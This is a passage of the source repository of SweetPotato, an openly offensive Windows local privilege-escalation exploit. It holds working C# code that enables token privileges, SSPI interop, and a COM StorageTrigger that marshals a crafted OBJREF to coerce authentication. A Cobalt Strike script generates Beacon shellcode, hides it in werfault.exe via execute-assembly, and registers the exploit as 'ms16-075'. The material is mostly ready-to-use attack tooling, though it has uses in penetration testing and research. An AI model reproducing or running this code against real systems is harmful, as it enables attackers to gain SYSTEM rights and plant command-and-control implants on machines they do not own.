SecurityEntity.SE_SYSTEM_PROFILE_NAME: 239 | return "SeSystemProfilePrivilege"; 240 | case SecurityEntity.SE_SYSTEMTIME_NAME: 241 | return "SeSystemtimePrivilege"; 242 | case SecurityEntity.SE_TAKE_OWNERSHIP_NAME: 243 | return "SeTakeOwnershipPrivilege"; 244 | case SecurityEntity.SE_TCB_NAME: 245 | return "SeTcbPrivilege"; 246 | case SecurityEntity.SE_TIME_ZONE_NAME: 247 | return "SeTimeZonePrivilege"; 248 | case SecurityEntity.SE_TRUSTED_CREDMAN_ACCESS_NAME: 249 | return "SeTrustedCredManAccessPrivilege"; 250 | case SecurityEntity.SE_UNDOCK_NAME: 251 | return "SeUndockPrivilege"; 252 | default: 253 | throw new ArgumentOutOfRangeException(typeof(SecurityEntity).Name); 254 | } 255 | } 256 | 257 | public static bool EnablePrivilege(SecurityEntity securityEntity) { 258 | const int ERROR_NOT_ALL_ASSIGNED = 1300; 259 | 260 | if (!Enum.IsDefined(typeof(SecurityEntity), securityEntity)) 261 | throw new InvalidEnumArgumentException("securityEntity", (int)securityEntity, typeof(SecurityEntity)); 262 | 263 | var securityEntityValue = GetSecurityEntityValue(securityEntity); 264 | try { 265 | var locallyUniqueIdentifier = new LUID(); 266 | 267 | if (LookupPrivilegeValue(null, securityEntityValue, ref locallyUniqueIdentifier)) { 268 | var TOKEN_PRIVILEGES = new TOKEN_PRIVILEGES(); 269 | TOKEN_PRIVILEGES.PrivilegeCount = 1; 270 | TOKEN_PRIVILEGES.Attributes = SE_PRIVILEGE_ENABLED; 271 | TOKEN_PRIVILEGES.Luid = locallyUniqueIdentifier; 272 | 273 | var tokenHandle = IntPtr.Zero; 274 | try { 275 | var currentProcess = GetCurrentProcess(); 276 | if (OpenProcessToken(currentProcess, TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, out tokenHandle)) { 277 | if (AdjustTokenPrivileges(tokenHandle, false, 278 | ref TOKEN_PRIVILEGES, 279 | 1024, IntPtr.Zero, IntPtr.Zero)) { 280 | var lastError = Marshal.GetLastWin32Error(); 281 | if (lastError == ERROR_NOT_ALL_ASSIGNED) { 282 | //Not likley to have the privilege 283 | return false; 284 | } else if (lastError != 0) { 285 | var win32Exception = new Win32Exception(); 286 | throw new InvalidOperationException("AdjustTokenPrivileges failed.", win32Exception); 287 | } else { 288 | return true; 289 | } 290 | } else { 291 | var win32Exception = new Win32Exception(); 292 | throw new InvalidOperationException("AdjustTokenPrivileges failed.", win32Exception); 293 | } 294 | } else { 295 | var win32Exception = new Win32Exception(); 296 | 297 | var exceptionMessage = string.Format(CultureInfo.InvariantCulture, 298 | "OpenProcessToken failed. CurrentProcess: {0}", 299 | currentProcess.ToInt32()); 300 | 301 | throw new InvalidOperationException(exceptionMessage, win32Exception); 302 | } 303 | } finally { 304 | if (tokenHandle != IntPtr.Zero) 305 | CloseHandle(tokenHandle); 306 | } 307 | } else { 308 | var win32Exception = new Win32Exception(); 309 | 310 | var exceptionMessage = string.Format(CultureInfo.InvariantCulture, 311 | "LookupPrivilegeValue failed. SecurityEntityValue: {0}", 312 | securityEntityValue); 313 | 314 | throw new InvalidOperationException(exceptionMessage, win32Exception); 315 | } 316 | } catch (Exception e) { 317 | var exceptionMessage = string.Format(CultureInfo.InvariantCulture, 318 | "GrandPrivilege failed. SecurityEntity: {0}", 319 | securityEntityValue); 320 | 321 | throw new InvalidOperationException(exceptionMessage, e); 322 | } 323 | } 324 | } 325 | } -------------------------------------------------------------------------------- /Security/SSPIHelper.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | public class SSPIHelper { 6 | 7 | public enum SecBufferType { 8 | SECBUFFER_VERSION = 0, 9 | SECBUFFER_EMPTY = 0, 10 | SECBUFFER_DATA = 1, 11 | SECBUFFER_TOKEN = 2 12 | } 13 | 14 | [StructLayout(LayoutKind.Sequential)] 15 | public struct SecBuffer : IDisposable { 16 | private int cbBuffer; 17 | private int bufferType; 18 | private IntPtr pvBuffer; 19 | 20 | public SecBuffer(int bufferSize) { 21 | cbBuffer = bufferSize; 22 | bufferType = (int)SecBufferType.SECBUFFER_TOKEN; 23 | if (bufferSize > 0) { 24 | pvBuffer = Marshal.AllocHGlobal(bufferSize); 25 | } else { 26 | pvBuffer = IntPtr.Zero; 27 | } 28 | } 29 | 30 | public SecBuffer(byte[] secBufferBytes) { 31 | cbBuffer = secBufferBytes.Length; 32 | bufferType = (int)SecBufferType.SECBUFFER_TOKEN; 33 | pvBuffer = Marshal.AllocHGlobal(cbBuffer); 34 | Marshal.Copy(secBufferBytes, 0, pvBuffer, cbBuffer); 35 | } 36 | 37 | public SecBuffer(byte[] secBufferBytes, SecBufferType bufferType) { 38 | cbBuffer = secBufferBytes.Length; 39 | this.bufferType = (int)bufferType; 40 | pvBuffer = Marshal.AllocHGlobal(cbBuffer); 41 | Marshal.Copy(secBufferBytes, 0, pvBuffer, cbBuffer); 42 | } 43 | 44 | public void Dispose() { 45 | if (pvBuffer != IntPtr.Zero) { 46 | Marshal.FreeHGlobal(pvBuffer); 47 | pvBuffer = IntPtr.Zero; 48 | } 49 | } 50 | 51 | public byte[] GetBytes() { 52 | byte[] buffer = null; 53 | if (cbBuffer > 0) { 54 | buffer = new byte[cbBuffer]; 55 | Marshal.Copy(pvBuffer, buffer, 0, cbBuffer); 56 | } 57 | return buffer; 58 | } 59 | } 60 | 61 | [StructLayout(LayoutKind.Sequential)] 62 | public struct SecBufferDesc : IDisposable { 63 | public int ulVersion; 64 | public int cBuffers; 65 | public IntPtr pBuffers; //Point to SecBuffer 66 | 67 | public SecBufferDesc(int bufferSize) { 68 | ulVersion = (int)SecBufferType.SECBUFFER_VERSION; 69 | cBuffers = 1; 70 | SecBuffer secBuffer = new SecBuffer(bufferSize); 71 | pBuffers = Marshal.AllocHGlobal(Marshal.SizeOf(secBuffer)); 72 | Marshal.StructureToPtr(secBuffer, pBuffers, false); 73 | 74 | } 75 | 76 | public SecBufferDesc(byte[] secBufferBytes) { 77 | ulVersion = (int)SecBufferType.SECBUFFER_VERSION; 78 | cBuffers = 1; 79 | SecBuffer secBuffer = new SecBuffer(secBufferBytes); 80 | pBuffers = Marshal.AllocHGlobal(Marshal.SizeOf(secBuffer)); 81 | Marshal.StructureToPtr(secBuffer, pBuffers, false); 82 | } 83 | 84 | public void Dispose() { 85 | if (pBuffers != IntPtr.Zero) { 86 | SecBuffer secBuffer = (SecBuffer)Marshal.PtrToStructure(pBuffers, typeof(SecBuffer)); 87 | secBuffer.Dispose(); 88 | Marshal.FreeHGlobal(pBuffers); 89 | pBuffers = IntPtr.Zero; 90 | } 91 | } 92 | 93 | public SecBuffer GetSecBuffer() { 94 | if (pBuffers == IntPtr.Zero) 95 | throw new ObjectDisposedException("SecBufferDesc"); 96 | SecBuffer secBuffer = (SecBuffer)Marshal.PtrToStructure(pBuffers, typeof(SecBuffer)); 97 | return secBuffer; 98 | } 99 | } 100 | 101 | [StructLayout(LayoutKind.Sequential, Pack = 8)] 102 | public class TimeStamp { 103 | public uint LowPart; 104 | public int HighPart; 105 | }; 106 | 107 | [StructLayout(LayoutKind.Sequential, Pack = 8)] 108 | public class CredHandle { 109 | IntPtr LowPart; 110 | IntPtr HighPart; 111 | }; 112 | 113 | [StructLayout(LayoutKind.Sequential, Pack = 8)] 114 | public class CtxHandle { 115 | IntPtr LowPart; 116 | IntPtr HighPart; 117 | }; 118 | 119 | 120 | [DllImport("secur32.dll", SetLastError = true)] 121 | public static extern int AcquireCredentialsHandle( 122 | string pszPrincipal, //SEC_CHAR* 123 | string pszPackage, //SEC_CHAR* //"Kerberos","NTLM","Negotiative" 124 | int fCredentialUse, 125 | IntPtr PAuthenticationID,//_LUID AuthenticationID,//pvLogonID, //PLUID 126 | IntPtr pAuthData,//PVOID 127 | IntPtr pGetKeyFn, //SEC_GET_KEY_FN 128 | IntPtr pvGetKeyArgument, //PVOID 129 | CredHandle phCredential, //SecHandle //PCtxtHandle ref 130 | TimeStamp ptsExpiry); //PTimeStamp //TimeStamp ref 131 | 132 | [DllImport("secur32.dll", SetLastError = true)] 133 | public static extern int AcceptSecurityContext(CredHandle phCredential, CtxHandle phContext, 134 | ref SecBufferDesc pInput, 135 | uint fContextReq, 136 | uint TargetDataRep, 137 | CtxHandle phNewContext, 138 | out SecBufferDesc pOutput, 139 | out uint pfContextAttr, //managed ulong == 64 bits!!! 140 | TimeStamp ptsTimeStamp); 141 | 142 | [DllImport("secur32.dll", SetLastError = true)] 143 | public static extern int QuerySecurityContextToken(CtxHandle phContext, out IntPtr hToken); 144 | 145 | public const int TOKEN_QUERY = 0x00008; 146 | public const int SEC_E_OK = 0; 147 | public const int SECPKG_CRED_OUTBOUND = 2; 148 | public const int SECURITY_NATIVE_DREP = 0x10; 149 | public const int SECPKG_CRED_INBOUND = 1; 150 | public const int MAX_TOKEN_SIZE = 12288; 151 | } 152 | } 153 | -------------------------------------------------------------------------------- /StorageTrigger.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | namespace SweetPotato { 5 | 6 | [ComVisible(true)] 7 | public class StorageTrigger : IMarshal, IStorage { 8 | 9 | private IStorage storage; 10 | private string binding; 11 | private TowerProtocol towerProtocol; 12 | 13 | public StorageTrigger(IStorage storage, string binding, TowerProtocol towerProtocol) { 14 | this.storage = storage; 15 | this.binding = binding; 16 | this.towerProtocol = towerProtocol; 17 | } 18 | 19 | public void DisconnectObject(uint dwReserved) { 20 | } 21 | 22 | public void GetMarshalSizeMax(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out uint pSize) { 23 | pSize = 1024; 24 | } 25 | 26 | public void GetUnmarshalClass(ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS, out Guid pCid) { 27 | pCid = new Guid("00000306-0000-0000-c000-000000000046"); 28 | } 29 | 30 | public void MarshalInterface(IStream pstm, ref Guid riid, IntPtr pv, uint dwDestContext, IntPtr pvDestContext, uint MSHLFLAGS) { 31 | 32 | ObjRef objRef = new ObjRef(Ole32.IID_IUnknown, 33 | new ObjRef.Standard(0x1000, 1, 0x0703d84a06ec96cc, 0x539d029cce31ac, new Guid("{042c939f-54cd-efd4-4bbd-1c3bae972145}"), 34 | new ObjRef.DualStringArray(new ObjRef.StringBinding(towerProtocol, binding), new ObjRef.SecurityBinding(0xa, 0xffff, null)))); 35 | 36 | uint written; 37 | byte[] data = objRef.GetBytes(); 38 | pstm.Write(data, (uint)data.Length, out written); 39 | } 40 | 41 | public void ReleaseMarshalData(IStream pstm) { 42 | } 43 | 44 | public void UnmarshalInterface(IStream pstm, ref Guid riid, out IntPtr ppv) { 45 | ppv = IntPtr.Zero; 46 | } 47 | 48 | public void Commit(uint grfCommitFlags) { 49 | storage.Commit(grfCommitFlags); 50 | } 51 | 52 | public void CopyTo(uint ciidExclude, Guid[] rgiidExclude, IntPtr snbExclude, IStorage pstgDest) { 53 | storage.CopyTo(ciidExclude, rgiidExclude, snbExclude, pstgDest); 54 | } 55 | 56 | public void CreateStorage(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStorage ppstg) { 57 | storage.CreateStorage(pwcsName, grfMode, reserved1, reserved2, out ppstg); 58 | } 59 | 60 | public void CreateStream(string pwcsName, uint grfMode, uint reserved1, uint reserved2, out IStream ppstm) { 61 | storage.CreateStream(pwcsName, grfMode, reserved1, reserved2, out ppstm); 62 | } 63 | 64 | public void DestroyElement(string pwcsName) { 65 | storage.DestroyElement(pwcsName); 66 | } 67 | 68 | public void EnumElements(uint reserved1, IntPtr reserved2, uint reserved3, out IEnumSTATSTG ppEnum) { 69 | storage.EnumElements(reserved1, reserved2, reserved3, out ppEnum); 70 | } 71 | 72 | public void MoveElementTo(string pwcsName, IStorage pstgDest, string pwcsNewName, uint grfFlags) { 73 | storage.MoveElementTo(pwcsName, pstgDest, pwcsNewName, grfFlags); 74 | } 75 | 76 | public void OpenStorage(string pwcsName, IStorage pstgPriority, uint grfMode, IntPtr snbExclude, uint reserved, out IStorage ppstg) { 77 | storage.OpenStorage(pwcsName, pstgPriority, grfMode, snbExclude, reserved, out ppstg); 78 | } 79 | 80 | public void OpenStream(string pwcsName, IntPtr reserved1, uint grfMode, uint reserved2, out IStream ppstm) { 81 | storage.OpenStream(pwcsName, reserved1, grfMode, reserved2, out ppstm); 82 | } 83 | 84 | public void RenameElement(string pwcsOldName, string pwcsNewName) { 85 | 86 | } 87 | 88 | public void Revert() { 89 | 90 | } 91 | 92 | public void SetClass(ref Guid clsid) { 93 | 94 | } 95 | 96 | public void SetElementTimes(string pwcsName, FILETIME[] pctime, FILETIME[] patime, FILETIME[] pmtime) { 97 | 98 | } 99 | 100 | public void SetStateBits(uint grfStateBits, uint grfMask) { 101 | } 102 | 103 | public void Stat(STATSTG[] pstatstg, uint grfStatFlag) { 104 | storage.Stat(pstatstg, grfStatFlag); 105 | pstatstg[0].pwcsName = "hello.stg"; 106 | } 107 | } 108 | } 109 | -------------------------------------------------------------------------------- /SweetPotato.cna: -------------------------------------------------------------------------------- 1 | # SweetPotato built as C# exe 2 | 3 | sub SweetPotato { 4 | local('$shellcode $arch $program $exe $parm'); 5 | 6 | # acknowledge this command 7 | btask($1, "Task Beacon to run " . listener_describe($2) . " via SweetPotato (ms16-075)", "T1068"); 8 | 9 | # tune our parameters based on the target arch 10 | if (-is64 $1) 11 | { 12 | $arch = "x64"; 13 | } else { 14 | $arch = "x86"; 15 | } 16 | $program = "c:\\windows\\system32\\werfault.exe"; 17 | $exe = script_resource("SweetPotato.exe"); 18 | # generate our shellcode 19 | $shellcode = base64_encode(payload($2, $arch)); 20 | # -c 4991D34B-80A1-4291-83B6-3328366B9097 21 | $parm = "-l 6363 "."-p $program "."-s $shellcode"; 22 | # spawn a Beacon post-ex job with bexecute_assembly 23 | bexecute_assembly!($1,$exe,$parm); 24 | # link to our payload if it's a TCP or SMB Beacon 25 | beacon_link($1, $null, $2); 26 | } 27 | beacon_exploit_register("SweetPotato", "SweetPotato (ms16-075)", &SweetPotato); 28 | 29 | -------------------------------------------------------------------------------- /SweetPotato.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E} 8 | Exe 9 | SweetPotato 10 | SweetPotato 11 | v4.0 12 | 512 13 | true 14 | 15 | publish\ 16 | true 17 | Disk 18 | false 19 | Foreground 20 | 7 21 | Days 22 | false 23 | false 24 | true 25 | 0 26 | 1.0.0.%2a 27 | false 28 | false 29 | true 30 | 31 | 32 | AnyCPU 33 | true 34 | full 35 | false 36 | bin\Debug\ 37 | DEBUG;TRACE 38 | prompt 39 | 4 40 | false 41 | 42 | 43 | AnyCPU 44 | pdbonly 45 | true 46 | bin\Release\ 47 | TRACE 48 | prompt 49 | 4 50 | 51 | 52 | 53 | SweetPotato.Program 54 | 55 | 56 | app.manifest 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | False 90 | .NET Framework 3.5 SP1 91 | false 92 | 93 | 94 | 95 | -------------------------------------------------------------------------------- /SweetPotato.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29926.136 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SweetPotato", "SweetPotato.csproj", "{1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}" 7 | EndProject 8 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ConsoleApp1", "..\ConsoleApp1\ConsoleApp1.csproj", "{B20941AB-2DE1-4743-8276-68AC37545055}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|Any CPU = Debug|Any CPU 13 | Release|Any CPU = Release|Any CPU 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 17 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Debug|Any CPU.Build.0 = Debug|Any CPU 18 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.ActiveCfg = Release|Any CPU 19 | {1BF9C10F-6F89-4520-9D2E-AAF17D17BA5E}.Release|Any CPU.Build.0 = Release|Any CPU 20 | {B20941AB-2DE1-4743-8276-68AC37545055}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 21 | {B20941AB-2DE1-4743-8276-68AC37545055}.Debug|Any CPU.Build.0 = Debug|Any CPU 22 | {B20941AB-2DE1-4743-8276-68AC37545055}.Release|Any CPU.ActiveCfg = Release|Any CPU 23 | {B20941AB-2DE1-4743-8276-68AC37545055}.Release|Any CPU.Build.0 = Release|Any CPU 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {2BF3BEBF-0E18-43E5-A34F-BC2C9ABDFEDD} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /app.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | -------------------------------------------------------------------------------- /app.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 17 | 18 | 19 | 20 | 21 | 22 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | 31 | 32 | 33 | 34 | 35 | 36 | --------------------------------------------------------------------------------